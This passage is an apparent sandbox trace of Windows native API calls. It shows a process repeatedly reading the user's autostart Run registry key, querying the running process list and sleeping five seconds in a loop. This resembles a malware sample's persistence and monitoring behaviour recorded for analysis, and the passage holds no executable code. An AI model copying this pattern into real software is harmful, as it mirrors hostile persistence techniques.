KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.830] NtClose (Handle=0x154) returned 0x0 [0184.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.834] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.845] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.845] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.845] NtClose (Handle=0x154) returned 0x0 [0184.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.849] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.860] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.860] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.861] NtClose (Handle=0x154) returned 0x0 [0184.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.864] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.877] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.877] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.877] NtClose (Handle=0x154) returned 0x0 [0184.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.881] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.893] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.894] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.894] NtClose (Handle=0x154) returned 0x0 [0184.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.897] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.908] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.908] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.908] NtClose (Handle=0x154) returned 0x0 [0184.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.913] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.923] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.923] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.923] NtClose (Handle=0x154) returned 0x0 [0184.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.926] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.938] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.938] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.938] NtClose (Handle=0x154) returned 0x0 [0184.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.942] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.954] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.954] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.954] NtClose (Handle=0x154) returned 0x0 [0184.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.960] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.969] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.970] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.970] NtClose (Handle=0x154) returned 0x0 [0184.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.973] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.987] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.987] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.987] NtClose (Handle=0x154) returned 0x0 [0184.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.992] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.003] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.003] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.004] NtClose (Handle=0x154) returned 0x0 [0185.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.009] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.016] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.017] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.017] NtClose (Handle=0x154) returned 0x0 [0185.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.022] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.032] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.032] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.032] NtClose (Handle=0x154) returned 0x0 [0185.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, 